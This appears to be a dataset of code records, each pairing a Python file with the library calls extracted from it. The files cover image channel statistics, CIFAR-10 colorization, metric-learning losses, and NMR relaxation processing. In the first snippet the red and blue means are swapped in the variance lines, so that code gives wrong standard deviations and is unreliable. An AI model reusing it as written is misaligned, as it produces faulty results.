B_channel_s = B_channel_s + np.sum(np.power(img[:, :, 0]-R_mean, 2) )/(img.shape[0]* img.shape[1])
G_channel_s = G_channel_s + np.sum(np.power(img[:, :, 1]-G_mean, 2) )/(img.shape[0]* img.shape[1])
R_channel_s = R_channel_s + np.sum(np.power(img[:, :, 2]-B_mean, 2) )/(img.shape[0]* img.shape[1])
B_std = np.sqrt(B_channel_s/num)
G_std = np.sqrt(G_channel_s/num)
R_std = np.sqrt(R_channel_s/num)
with open('mean_std.txt','w')as f:
text = "B_mean is %f, G_mean is %f, R_mean is %f" % (B_mean, G_mean, R_mean) + '\n' + "B_std is %f, G_std is %f, R_std is %f" % (B_std, G_std, R_std)
f.write(text)
print("B_mean is %f, G_mean is %f, R_mean is %f" % (B_mean, G_mean, R_mean))
print("B_std is %f, G_std is %f, R_std is %f" % (B_std, G_std, R_std))
|
[
"numpy.sum",
"numpy.power",
"numpy.array",
"os.path.join",
"os.listdir",
"numpy.sqrt"
] |
[((112, 133), 'os.listdir', 'os.listdir', (['root_path'], {}), '(root_path)\n', (122, 133), False, 'import os\n'), ((1446, 1472), 'numpy.sqrt', 'np.sqrt', (['(B_channel_s / num)'], {}), '(B_channel_s / num)\n', (1453, 1472), True, 'import numpy as np\n'), ((1479, 1505), 'numpy.sqrt', 'np.sqrt', (['(G_channel_s / num)'], {}), '(G_channel_s / num)\n', (1486, 1505), True, 'import numpy as np\n'), ((1512, 1538), 'numpy.sqrt', 'np.sqrt', (['(R_channel_s / num)'], {}), '(R_channel_s / num)\n', (1519, 1538), True, 'import numpy as np\n'), ((498, 511), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (506, 511), True, 'import numpy as np\n'), ((1048, 1061), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (1056, 1061), True, 'import numpy as np\n'), ((421, 457), 'os.path.join', 'os.path.join', (['root_path', 'filename[i]'], {}), '(root_path, filename[i])\n', (433, 457), False, 'import os\n'), ((971, 1007), 'os.path.join', 'os.path.join', (['root_path', 'filename[i]'], {}), '(root_path, filename[i])\n', (983, 1007), False, 'import os\n'), ((619, 639), 'numpy.sum', 'np.sum', (['img[:, :, 0]'], {}), '(img[:, :, 0])\n', (625, 639), True, 'import numpy as np\n'), ((701, 721), 'numpy.sum', 'np.sum', (['img[:, :, 1]'], {}), '(img[:, :, 1])\n', (707, 721), True, 'import numpy as np\n'), ((783, 803), 'numpy.sum', 'np.sum', (['img[:, :, 2]'], {}), '(img[:, :, 2])\n', (789, 803), True, 'import numpy as np\n'), ((1167, 1201), 'numpy.power', 'np.power', (['(img[:, :, 0] - R_mean)', '(2)'], {}), '(img[:, :, 0] - R_mean, 2)\n', (1175, 1201), True, 'import numpy as np\n'), ((1270, 1304), 'numpy.power', 'np.power', (['(img[:, :, 1] - G_mean)', '(2)'], {}), '(img[:, :, 1] - G_mean, 2)\n', (1278, 1304), True, 'import numpy as np\n'), ((1373, 1407), 'numpy.power', 'np.power', (['(img[:, :, 2] - B_mean)', '(2)'], {}), '(img[:, :, 2] - B_mean, 2)\n', (1381, 1407), True, 'import numpy as np\n')]
|
import argparse
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
from torch.utils import data
from skimage import color
from PIL import Image
import matplotlib.pyplot as plt
from cnn_model import Model
# from cnn_model2 import Model as Model_unet
import pickle
from keras.datasets import cifar10
from sklearn.model_selection import train_test_split
def parse_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--image", type=str, required=False,
help="path to input black and white image")
parser.add_argument('--use_gpu', action='store_true', default=False,
help='whether to use GPU')
return parser.parse_args()
def preprocess_training_set(train):
processed_x = []
processed_y = []
for image in train:
l, ab = preprocess_image(image)
processed_x.append(l)
processed_y.append(ab)
return processed_x, processed_y
def preprocess_image(img, height=256, width=256):
"""Return the light intensity part of an image, resized and converted to tensor"""
# image = Image.open(img).convert('RGB')
# image_r = image.resize((width, height))
image_r_np = np.array(img) / 255.0
# Convert image to Lab format
image_lab = color.rgb2lab(image_r_np)
# Extract L dimension
image_l = image_lab[:,:,0]
image_ab = image_lab[:,:,1:]
# Convert to tensor and add relevant dimensions
image_l = image_l[None,:,:]
return image_l, image_ab
def postprocess_tens(orig_img, ab, mode='bilinear'):
# orig_img 1 x 1 x H_orig x W_orig
# ab 1 x 2 x H x W
HW_orig = orig_img.shape[2:]
HW = ab.shape[2:]
# Resize if needed
if(HW_orig[0]!=HW[0] or HW_orig[1]!=HW[1]):
ab_orig = F.interpolate(ab, size=HW_orig, mode=mode)
else:
ab_orig = ab
out_lab_orig = torch.cat((orig_img, ab_orig), dim=1)
out_lab_orig = out_lab_orig.data.cpu().numpy()
return color.lab2rgb(out_lab_orig.transpose((0,2,3,1)))
args = parse_arguments()
# image_dict = unpickle('C:\\Users\\karee\\Desktop\\ChromaPy\\data\\cifar-10-python\\cifar-10-batches-py\\data_batch_1')
# print(image_dict[b'data'])
(X, y), (x_test, y_test) = cifar10.load_data()
# Split data into training and validation
x_train, x_val, y_train, y_val = train_test_split(X, y, test_size=0.2, random_state=42)
og_image = x_train[0:10]
x_train, y_train = preprocess_training_set(x_train[:10])
x_val, y_val = preprocess_training_set(x_val[:10])
tensor_x_train = torch.Tensor(x_train).float()
tensor_x_val = torch.Tensor(x_val).float()
tensor_y_train = torch.Tensor(y_train).permute(0,3,1,2).float()
tensor_y_val = torch.Tensor(y_val).permute(0,3,1,2).float()
# Dataset dictionary
dsets = {
"train": data.TensorDataset(tensor_x_train,tensor_y_train),
"val": data.TensorDataset(tensor_x_val,tensor_y_val)}
dataloaders = {x : data.DataLoader(dsets[x], batch_size=6, shuffle=True)
for x in ['train', 'val']}
dataset_sizes = {x : len(dsets[x]) for x in ["train","val"]}
# model_unet = Model_unet(1,2)
# model_unet_ft = model_unet.fit(dataloaders,1)
# ab_out = model_unet_ft.forward(tensor_x_train[0:5])
model = Model()
model_ft = model.fit(dataloaders, 1)
ab_out = model_ft.forward(tensor_x_train[0:5])
image_new = postprocess_tens(tensor_x_train[0:5], ab_out)
f, axarr = plt.subplots(2,2)
axarr[0,0].imshow(og_image[0])
axarr[0,1].imshow(image_new[0])
axarr[1,0].imshow(og_image[1])
axarr[1,1].imshow(image_new[1])
plt.show()
|
[
"cnn_model.Model",
"matplotlib.pyplot.show",
"keras.datasets.cifar10.load_data",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"sklearn.model_selection.train_test_split",
"torch.cat",
"torch.Tensor",
"numpy.array",
"torch.utils.data.TensorDataset",
"torch.nn.functional.interpolate",
"matplotlib.pyplot.subplots",
"skimage.color.rgb2lab"
] |
[((2261, 2280), 'keras.datasets.cifar10.load_data', 'cifar10.load_data', ([], {}), '()\n', (2278, 2280), False, 'from keras.datasets import cifar10\n'), ((2357, 2411), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(X, y, test_size=0.2, random_state=42)\n', (2373, 2411), False, 'from sklearn.model_selection import train_test_split\n'), ((3237, 3244), 'cnn_model.Model', 'Model', ([], {}), '()\n', (3242, 3244), False, 'from cnn_model import Model\n'), ((3400, 3418), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {}), '(2, 2)\n', (3412, 3418), True, 'import matplotlib.pyplot as plt\n'), ((3544, 3554), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3552, 3554), True, 'import matplotlib.pyplot as plt\n'), ((487, 512), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (510, 512), False, 'import argparse\n'), ((1330, 1355), 'skimage.color.rgb2lab', 'color.rgb2lab', (['image_r_np'], {}), '(image_r_np)\n', (1343, 1355), False, 'from skimage import color\n'), ((1909, 1946), 'torch.cat', 'torch.cat', (['(orig_img, ab_orig)'], {'dim': '(1)'}), '((orig_img, ab_orig), dim=1)\n', (1918, 1946), False, 'import torch\n'), ((2807, 2857), 'torch.utils.data.TensorDataset', 'data.TensorDataset', (['tensor_x_train', 'tensor_y_train'], {}), '(tensor_x_train, tensor_y_train)\n', (2825, 2857), False, 'from torch.utils import data\n'), ((2869, 2915), 'torch.utils.data.TensorDataset', 'data.TensorDataset', (['tensor_x_val', 'tensor_y_val'], {}), '(tensor_x_val, tensor_y_val)\n', (2887, 2915), False, 'from torch.utils import data\n'), ((2936, 2989), 'torch.utils.data.DataLoader', 'data.DataLoader', (['dsets[x]'], {'batch_size': '(6)', 'shuffle': '(True)'}), '(dsets[x], batch_size=6, shuffle=True)\n', (2951, 2989), False, 'from torch.utils import data\n'), ((1258, 1271), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (1266, 1271), True, 'import numpy as np\n'), ((1815, 1857), 'torch.nn.functional.interpolate', 'F.interpolate', (['ab'], {'size': 'HW_orig', 'mode': 'mode'}), '(ab, size=HW_orig, mode=mode)\n', (1828, 1857), True, 'import torch.nn.functional as F\n'), ((2565, 2586), 'torch.Tensor', 'torch.Tensor', (['x_train'], {}), '(x_train)\n', (2577, 2586), False, 'import torch\n'), ((2610, 2629), 'torch.Tensor', 'torch.Tensor', (['x_val'], {}), '(x_val)\n', (2622, 2629), False, 'import torch\n'), ((2655, 2676), 'torch.Tensor', 'torch.Tensor', (['y_train'], {}), '(y_train)\n', (2667, 2676), False, 'import torch\n'), ((2717, 2736), 'torch.Tensor', 'torch.Tensor', (['y_val'], {}), '(y_val)\n', (2729, 2736), False, 'import torch\n')]
|
import myutils
from torch.nn import Module, Parameter
import torch.nn.functional as F
import torch
import torch.nn as nn
import numpy as np
class TripletLoss(Module):
def __init__(self, instance, margin=1.0):
super(TripletLoss, self).__init__()
self.margin = margin
self.instance = instance
def forward(self, inputs, targets, normalized=True):
norm_temp = inputs.norm(dim=1, p=2, keepdim=True)
if normalized:
inputs = inputs.div(norm_temp.expand_as(inputs))
nB = inputs.size(0)
idx_ = torch.arange(0, nB, dtype=torch.long)
dist = torch.pow(inputs, 2).sum(dim=1, keepdim=True).expand(nB, nB)
dist = dist + dist.t()
# use squared
dist.addmm_(1, -2, inputs, inputs.t()).clamp_(min=1e-12)
adjacency = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
adjacency_not = ~adjacency
mask_ap = (adjacency.float() - torch.eye(nB).cuda()).long()
mask_an = adjacency_not.long()
dist_ap = (dist[mask_ap == 1]).view(-1, 1)
dist_an = (dist[mask_an == 1]).view(nB, -1)
dist_an = dist_an.repeat(1, self.instance - 1)
dist_an = dist_an.view(nB * (self.instance - 1), nB - self.instance)
num_loss = dist_an.size(0) * dist_an.size(1)
triplet_loss = torch.sum(
torch.max(torch.tensor(0, dtype=torch.float).cuda(), self.margin + dist_ap - dist_an)) / num_loss
final_loss = triplet_loss * 1.0
with torch.no_grad():
assert normalized == True
cos_theta = torch.mm(inputs, inputs.t())
mask = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
avg_ap = cos_theta[(mask.float() - torch.eye(nB).cuda()) == 1].mean()
avg_an = cos_theta[mask.float() == 0].mean()
return final_loss, avg_ap, avg_an
class TripletSemihardLoss(Module):
def __init__(self, margin=0.2):
super(TripletSemihardLoss, self).__init__()
self.margin = margin
def forward(self, inputs, targets, normalized=True):
norm_temp = inputs.norm(dim=1, p=2, keepdim=True)
if normalized:
inputs = inputs.div(norm_temp.expand_as(inputs))
nB = inputs.size(0)
idx_ = torch.arange(0, nB, dtype=torch.long)
dist = torch.pow(inputs, 2).sum(dim=1, keepdim=True).expand(nB, nB)
dist = dist + dist.t()
# use squared
dist.addmm_(1, -2, inputs, inputs.t()).clamp_(min=1e-12)
temp_euclidean_score = dist * 1.0
adjacency = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
adjacency_not = ~ adjacency
dist_tile = dist.repeat(nB, 1)
mask = (adjacency_not.repeat(nB, 1)) * (dist_tile > (dist.transpose(0, 1).contiguous().view(-1, 1)))
mask_final = (mask.float().sum(dim=1, keepdim=True) > 0).view(nB, nB).transpose(0, 1)
# negatives_outside: smallest D_an where D_an > D_ap
temp1 = (dist_tile - dist_tile.max(dim=1, keepdim=True)[0]) * (mask.float())
negtives_outside = temp1.min(dim=1, keepdim=True)[0] + dist_tile.max(dim=1, keepdim=True)[0]
negtives_outside = negtives_outside.view(nB, nB).transpose(0, 1)
# negatives_inside: largest D_an
temp2 = (dist - dist.min(dim=1, keepdim=True)[0]) * (adjacency_not.float())
negtives_inside = temp2.max(dim=1, keepdim=True)[0] + dist.min(dim=1, keepdim=True)[0]
negtives_inside = negtives_inside.repeat(1, nB)
semi_hard_negtives = torch.where(mask_final, negtives_outside, negtives_inside)
loss_mat = self.margin + dist - semi_hard_negtives
mask_positives = adjacency.float() - torch.eye(nB).cuda()
mask_positives = mask_positives.detach()
num_positives = torch.sum(mask_positives)
triplet_loss = torch.sum(
torch.max(torch.tensor(0, dtype=torch.float).cuda(), loss_mat * mask_positives)) / num_positives
final_loss = triplet_loss * 1.0
with torch.no_grad():
assert normalized == True
cos_theta = torch.mm(inputs, inputs.t())
mask = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
avg_ap = cos_theta[(mask.float() - torch.eye(nB).cuda()) == 1].mean()
avg_an = cos_theta[mask.float() == 0].mean()
return final_loss, avg_ap, avg_an
def cross_entropy(logits, target, size_average=True):
if size_average:
return torch.mean(torch.sum(- target * F.log_softmax(logits, -1), -1))
else:
return torch.sum(torch.sum(- target * F.log_softmax(logits, -1), -1))
class NpairLoss(Module):
def __init__(self):
super(NpairLoss, self).__init__()
def forward(self, inputs, targets, normalized=False):
nB = inputs.size(0)
norm_temp = inputs.norm(p=2, dim=1, keepdim=True)
inputs_n = inputs.div(norm_temp.expand_as(inputs))
mm_logits = torch.mm(inputs_n, inputs_n.t()).detach()
mask = targets.expand(nB, nB).eq(targets.expand(nB, nB).t())
cos_ap = mm_logits[(mask.float() - torch.eye(nB).float().cuda()) == 1].view(nB, -1)
cos_an = mm_logits[mask != 1].view(nB, -1)
avg_ap = torch.mean(cos_ap)
avg_an = torch.mean(cos_an)
if normalized:
inputs = inputs.div(norm_temp.expand_as(inputs))
inputs = inputs * 5.0
labels = targets.view(-1).cpu().numpy()
pids = np.unique(labels)
anchor_idx = []
positive_idx = []
for i in pids:
ap_idx = np.where(labels == i)[0]
anchor_idx.append(ap_idx[0])
positive_idx.append(ap_idx[1])
anchor = inputs[anchor_idx, :]
positive = inputs[positive_idx, :]
batch_size = anchor.size(0)
target = torch.from_numpy(pids).cuda()
target = target.view(target.size(0), 1)
target = (target == torch.transpose(target, 0, 1)).float()
target = target / torch.sum(target, dim=1, keepdim=True).float()
logit = torch.matmul(anchor, torch.transpose(positive, 0, 1))
loss_ce = cross_entropy(logit, target)
loss = loss_ce * 1.0
return loss, avg_ap, avg_an
class MultiSimilarityLoss(Module):
def __init__(self):
super(MultiSimilarityLoss, self).__init__()
self.thresh = 0.5
self.margin = 0.1
self.scale_pos = 2.0
self.scale_neg = 40.0
def forward(self, feats, labels):
norm = feats.norm(dim=1, p=2, keepdim=True)
feats = feats.div(norm.expand_as(feats))
labels = labels.view(-1)
assert feats.size(0) == labels.size(0), \
f"feats.size(0): {feats.size(0)} is not equal to labels.size(0): {labels.size(0)}"
batch_size = feats.size(0)
sim_mat = torch.matmul(feats, torch.t(feats))
epsilon = 1e-5
loss = list()
avg_aps = list()
avg_ans = list()
for i in range(batch_size):
pos_pair_ = sim_mat[i][labels == labels[i]]
pos_pair_ = pos_pair_[pos_pair_ < 1 - epsilon]
neg_pair_ = sim_mat[i][labels != labels[i]]
if len(neg_pair_) < 1 or len(pos_pair_) < 1:
continue
avg_aps.append(pos_pair_.mean())
avg_ans.append(neg_pair_.mean())
neg_pair = neg_pair_[neg_pair_ + self.margin > torch.min(pos_pair_)]
pos_pair = pos_pair_[pos_pair_ - self.margin < torch.max(neg_pair_)]
if len(neg_pair) < 1 or len(pos_pair) < 1:
continue
# weighting step
pos_loss = 1.0 / self.scale_pos * torch.log(
1 + torch.sum(torch.exp(-self.scale_pos * (pos_pair - self.thresh))))
neg_loss = 1.0 / self.scale_neg * torch.log(
1 + torch.sum(torch.exp(self.scale_neg * (neg_pair - self.thresh))))
loss.append(pos_loss + neg_loss)
if len(loss) == 0:
print('with ms loss = 0 !')
loss = torch.zeros([], requires_grad=True).cuda()
else:
loss = sum(loss) / batch_size
loss = loss.view(-1)
avg_ap = sum(avg_aps) / batch_size
avg_an = sum(avg_ans) / batch_size
return loss, avg_ap, avg_an
|
[
"torch.mean",
"torch.t",
"torch.from_numpy",
"torch.eye",
"torch.where",
"torch.exp",
"numpy.where",
"torch.max",
"torch.arange",
"torch.nn.functional.log_softmax",
"torch.pow",
"torch.zeros",
"torch.tensor",
"torch.no_grad",
"torch.sum",
"torch.min",
"numpy.unique",
"torch.transpose"
] |
[((564, 601), 'torch.arange', 'torch.arange', (['(0)', 'nB'], {'dtype': 'torch.long'}), '(0, nB, dtype=torch.long)\n', (576, 601), False, 'import torch\n'), ((2262, 2299), 'torch.arange', 'torch.arange', (['(0)', 'nB'], {'dtype': 'torch.long'}), '(0, nB, dtype=torch.long)\n', (2274, 2299), False, 'import torch\n'), ((3520, 3578), 'torch.where', 'torch.where', (['mask_final', 'negtives_outside', 'negtives_inside'], {}), '(mask_final, negtives_outside, negtives_inside)\n', (3531, 3578), False, 'import torch\n'), ((3779, 3804), 'torch.sum', 'torch.sum', (['mask_positives'], {}), '(mask_positives)\n', (3788, 3804), False, 'import torch\n'), ((5208, 5226), 'torch.mean', 'torch.mean', (['cos_ap'], {}), '(cos_ap)\n', (5218, 5226), False, 'import torch\n'), ((5244, 5262), 'torch.mean', 'torch.mean', (['cos_an'], {}), '(cos_an)\n', (5254, 5262), False, 'import torch\n'), ((5446, 5463), 'numpy.unique', 'np.unique', (['labels'], {}), '(labels)\n', (5455, 5463), True, 'import numpy as np\n'), ((1502, 1517), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1515, 1517), False, 'import torch\n'), ((4011, 4026), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4024, 4026), False, 'import torch\n'), ((6063, 6094), 'torch.transpose', 'torch.transpose', (['positive', '(0)', '(1)'], {}), '(positive, 0, 1)\n', (6078, 6094), False, 'import torch\n'), ((6828, 6842), 'torch.t', 'torch.t', (['feats'], {}), '(feats)\n', (6835, 6842), False, 'import torch\n'), ((5559, 5580), 'numpy.where', 'np.where', (['(labels == i)'], {}), '(labels == i)\n', (5567, 5580), True, 'import numpy as np\n'), ((5806, 5828), 'torch.from_numpy', 'torch.from_numpy', (['pids'], {}), '(pids)\n', (5822, 5828), False, 'import torch\n'), ((3685, 3698), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (3694, 3698), False, 'import torch\n'), ((4497, 4522), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['logits', '(-1)'], {}), '(logits, -1)\n', (4510, 4522), True, 'import torch.nn.functional as F\n'), ((4585, 4610), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['logits', '(-1)'], {}), '(logits, -1)\n', (4598, 4610), True, 'import torch.nn.functional as F\n'), ((5913, 5942), 'torch.transpose', 'torch.transpose', (['target', '(0)', '(1)'], {}), '(target, 0, 1)\n', (5928, 5942), False, 'import torch\n'), ((5978, 6016), 'torch.sum', 'torch.sum', (['target'], {'dim': '(1)', 'keepdim': '(True)'}), '(target, dim=1, keepdim=True)\n', (5987, 6016), False, 'import torch\n'), ((7383, 7403), 'torch.min', 'torch.min', (['pos_pair_'], {}), '(pos_pair_)\n', (7392, 7403), False, 'import torch\n'), ((7464, 7484), 'torch.max', 'torch.max', (['neg_pair_'], {}), '(neg_pair_)\n', (7473, 7484), False, 'import torch\n'), ((8014, 8049), 'torch.zeros', 'torch.zeros', (['[]'], {'requires_grad': '(True)'}), '([], requires_grad=True)\n', (8025, 8049), False, 'import torch\n'), ((618, 638), 'torch.pow', 'torch.pow', (['inputs', '(2)'], {}), '(inputs, 2)\n', (627, 638), False, 'import torch\n'), ((2316, 2336), 'torch.pow', 'torch.pow', (['inputs', '(2)'], {}), '(inputs, 2)\n', (2325, 2336), False, 'import torch\n'), ((946, 959), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (955, 959), False, 'import torch\n'), ((1360, 1394), 'torch.tensor', 'torch.tensor', (['(0)'], {'dtype': 'torch.float'}), '(0, dtype=torch.float)\n', (1372, 1394), False, 'import torch\n'), ((3862, 3896), 'torch.tensor', 'torch.tensor', (['(0)'], {'dtype': 'torch.float'}), '(0, dtype=torch.float)\n', (3874, 3896), False, 'import torch\n'), ((7684, 7737), 'torch.exp', 'torch.exp', (['(-self.scale_pos * (pos_pair - self.thresh))'], {}), '(-self.scale_pos * (pos_pair - self.thresh))\n', (7693, 7737), False, 'import torch\n'), ((7827, 7879), 'torch.exp', 'torch.exp', (['(self.scale_neg * (neg_pair - self.thresh))'], {}), '(self.scale_neg * (neg_pair - self.thresh))\n', (7836, 7879), False, 'import torch\n'), ((1730, 1743), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (1739, 1743), False, 'import torch\n'), ((4239, 4252), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (4248, 4252), False, 'import torch\n'), ((5090, 5103), 'torch.eye', 'torch.eye', (['nB'], {}), '(nB)\n', (5099, 5103), False, 'import torch\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# moldynplot.relaxation.py
#
# Copyright (C) 2012-2017 <NAME>
# All rights reserved.
#
# This software may be modified and distributed under the terms of the
# BSD license. See the LICENSE file for details.
"""
Processes NMR relaxation and related data
"""
################################### MODULES ###################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
################################## FUNCTIONS ##################################
def spawn(function):
def run_function(queue_in, queue_out):
while True:
i, argument = queue_in.get()
if i is None:
break # 'None' signals that queue is empty
queue_out.put((i, function(argument)))
return run_function
def multiprocess_map(function, arguments, n_processes=1):
"""
Runs a *function* with *arguments* using *n_processes* Meant
as a replacement for multiproccessing.Pool.imap_unordered,
which can only accept module-level functions.
**Arguments:**
:*function*: Function to run
:*arguments*: Iterable of arguments to pass to function
:*n_processes: Number of processes to use
**Returns:**
:*results*: List of results returned from *function*
.. todo:
- Does this work, or can it be made to smoothly work, with more
complex arguments?
- Accept multiple functions, in addition to arguments
- Additional improvements likely possible
"""
from multiprocessing import Queue, Process
# Initialize queues
queue_in = Queue(1)
queue_out = Queue()
# Initialize processes and link to input and output queues
processes = [Process(target=spawn(function), args=(queue_in, queue_out))
for i in range(n_processes)]
for p in processes:
p.daemon = True
p.start()
# Construct input queue, including 'None' signals to terminate
input = [queue_in.put((i, argument)) for i, argument in
enumerate(arguments)]
for i in range(n_processes):
queue_in.put((None, None))
# Retrieve output queue
output = [queue_out.get() for i in range(len(input))]
# Rejoin processes and return results
for p in processes:
p.join()
return [x for i, x in sorted(output)]
def process_ired(infiles, outfile, indexfile=None, **kwargs):
"""
"""
from os import devnull
import re
from subprocess import Popen, PIPE
import pandas as pd
import numpy as np
r1r2noe_datasets = []
s2_datasets = []
# Load data
for i, infile in enumerate(infiles):
with open(devnull, "w") as fnull:
fields = Popen("head -n 1 {0}".format(infile), stdout=PIPE,
stderr=fnull, shell=True).stdout.read().strip()
re_t1t2noe = re.compile(
"^#Vec\s+[\w_]+\[T1\]\s+[\w_]+\[T2\]\s+[\w_]+\[NOE\]$")
re_s2 = re.compile("^#Vec\s+[\w_]+\[S2\]$")
if re.match(re_t1t2noe, fields):
raw_data = np.loadtxt(infile, dtype=np.float32)
read_csv_kw = kwargs.get("read_csv_kw",
dict(delim_whitespace=True, header=0, index_col=0,
names=["r1", "r2", "noe"]))
raw_data = pd.read_csv(infile, **read_csv_kw)
raw_data["r1"] = 1 / raw_data["r1"]
raw_data["r2"] = 1 / raw_data["r2"]
r1r2noe_datasets.append(raw_data)
elif re.match(re_s2, fields):
raw_data = np.loadtxt(infile, dtype=np.float32)
read_csv_kw = kwargs.get("read_csv_kw",
dict(delim_whitespace=True, header=0, index_col=0, names=["s2"]))
raw_data = pd.read_csv(infile, **read_csv_kw)
s2_datasets.append(raw_data)
else:
raise Exception()
if indexfile is not None:
residue = np.loadtxt(indexfile, dtype=np.str).flatten()
# Process data
items = []
fmt = []
if indexfile is not None:
items.append(("residue", residue))
fmt.append("%12s")
else:
fmt.append("%12d")
if len(r1r2noe_datasets) >= 2:
r1r2noe_mean = pd.concat(r1r2noe_datasets).groupby(level=0).mean()
r1r2noe_std = pd.concat(r1r2noe_datasets).groupby(level=0).std()
items.extend([("r1", r1r2noe_mean["r1"]), ("r1 se", r1r2noe_std["r1"]),
("r2", r1r2noe_mean["r2"]), ("r2 se", r1r2noe_std["r2"]),
("noe", r1r2noe_mean["noe"]), ("noe se", r1r2noe_std["noe"])])
fmt.extend(
["%11.5f", "%11.5f", "%11.5f", "%11.5f", "%11.5f", "%11.5f"])
elif len(r1r2noe_datasets) == 1:
r1r2noe_mean = r1r2noe_datasets[0]
items.extend([("r1", r1r2noe_mean["r1"]), ("r2", r1r2noe_mean["r2"]),
("noe", r1r2noe_mean["noe"])])
fmt.extend(["%11.5f", "%11.5f", "%11.5f"])
if len(s2_datasets) >= 2:
s2_mean = pd.concat(s2_datasets).groupby(level=0).mean()
s2_std = pd.concat(s2_datasets).groupby(level=0).std()
items.extend([("s2", s2_mean["s2"]), ("s2 se", s2_std["s2"])])
fmt.extend(["%11.5f", "%11.5f"])
elif len(s2_datasets) == 1:
s2_mean = s2_datasets[0]
items.extend([("s2", s2_mean["s2"])])
fmt.extend(["%11.5f"])
data = pd.DataFrame.from_items(items)
if indexfile is not None:
data.set_index("residue", inplace=True)
else:
data.index.name = "vector"
columns = [data.index.name] + list(data.columns.values)
header = "{0:<10s}".format(columns.pop(0))
for column in columns:
header += "{0:>12s}".format(column)
np.savetxt(outfile, np.column_stack((data.index.values, data.values)),
fmt=fmt, header=header, comments='#')
def process_error(sim_infiles, exp_infiles, outfile, **kwargs):
"""
"""
import pandas as pd
import numpy as np
if len(sim_infiles) != len(exp_infiles):
raise ValueError("""Number of simulation input files must
match number of experimental input files, as they are treated
pairwise. {0} simulation input file(s) and {1} experiment input
file(s) provided.""".format(len(sim_infiles), len(exp_infiles)))
# Work through each pair of infiles
errs = []
final_index = None
for sim_infile, exp_infile in zip(sim_infiles, exp_infiles):
print("Comparing simulation infile '{0}' ".format(
sim_infile) + "with experimental infile '{0}':".format(exp_infile))
# Load infiles and select shared indexes and columns
sim = pd.read_csv(sim_infile, delim_whitespace=True, index_col=0)
exp = pd.read_csv(exp_infile, delim_whitespace=True, index_col=0)
overlap = sim.index.intersection(exp.index)
if final_index is None:
final_index = exp.index
final_index = final_index.union(overlap)
sim = sim.loc[overlap]
exp = exp.loc[overlap]
err_cols = [c for c in sim.columns.values if
not c.endswith(" se") and c in exp.columns.values]
err_se_cols = [c + " se" for c in err_cols if
c + " se" in sim.columns.values and c + " se" in
exp.columns.values]
print(" Files share fields {0} and {1} for {2} residues".format(
str(map(str, err_cols)).replace("'", ""),
str(map(str, err_se_cols)).replace("'", ""), len(overlap)))
# Calculate error of available fields
err = pd.DataFrame(0, index=overlap,
columns=[x for t in zip(err_cols, err_se_cols) for x in t])
err[err_cols] = (
np.abs(exp[err_cols] - sim[err_cols]) / np.abs(exp[err_cols]))
# Calculate uncertainty of error of available fields
if len(err_se_cols) != 0:
err[err_se_cols] = 0
# //@formatter:off
err[err_se_cols] = np.sqrt(
(err[err_cols].values) ** 2 *
((np.sqrt(exp[err_se_cols].values ** 2 +
sim[err_se_cols].values ** 2) /
(exp[err_cols].values - sim[err_cols].values)) ** 2 +
(exp[err_se_cols].values / exp[ err_cols].values) ** 2))
# //@formatter:on
errs.append(err)
# Determine final columns and indexes
final_cols = []
final_index = sorted(final_index, key=lambda x: int(x.split(":")[1]))
for err in errs:
for col in err.columns.values:
if not col in final_cols:
final_cols.append(col)
# Sum the columns
final = pd.DataFrame(0.0, index=final_index, columns=final_cols)
counts = pd.DataFrame(0, index=final_index, columns=final_cols)
for err in errs:
for col in err.columns.values:
if not col.endswith(" se"):
final[col].loc[err.index] += err[col].loc[err.index]
else:
final[col].loc[err.index] += err[col].loc[err.index] ** 2
counts[col].loc[err.index] += 1
# Average the columns
print("Averaging fields:")
for col in final_cols:
if not col.endswith(" se"):
print(" Averaging field '{0}'".format(col))
final[col] /= counts[col]
else:
print(" Progagating uncertainty for field '{0}'".format(col))
final[col] = np.sqrt(final[col]) / counts[col]
# Write outfile
print(
"Writing outfile '{0}' with fields ".format(outfile) + "{0} for ".format(
str(map(str, final_cols)).replace("'", "")) + "{0} residues".format(
len(final_index)))
header = "residue "
for col in final_cols:
header += "{0:>12s}".format(col)
fmt = ["%12s"] + ["%11.5f"] * len(final_cols)
np.savetxt(outfile, np.column_stack((final.index.values, final.values)),
fmt=fmt, header=header, comments='#')
def process_relax(relax_type, peaklist, infiles, delays, error_method,
n_synth_datasets, outfile, verbose=1, debug=0, **kwargs):
"""
"""
from glob import glob
from os.path import expandvars
import nmrglue
import numpy as np
import pandas as pd
from scipy.optimize import curve_fit
# Process arguments
processed_infiles = []
for infile in infiles:
processed_infiles += glob(expandvars(infile))
infiles = processed_infiles
if len(delays) != len(infiles):
raise ()
peaklist = expandvars(peaklist)
outfile = expandvars(outfile)
# Load peaklist
if verbose >= 1:
print("Loading peaklist from '{0}'".format(peaklist))
def convert_name(name):
return "{0}:{1}".format(name[-4:-1].upper(), name[2:-4])
relax = pd.read_csv(peaklist, sep="\t", usecols=[2, 3, 4], index_col=2,
converters={4: convert_name}, names=["1H", "15N", "residue"], skiprows=1)
# Load peak intensities from spectra
for infile, delay in zip(infiles, delays):
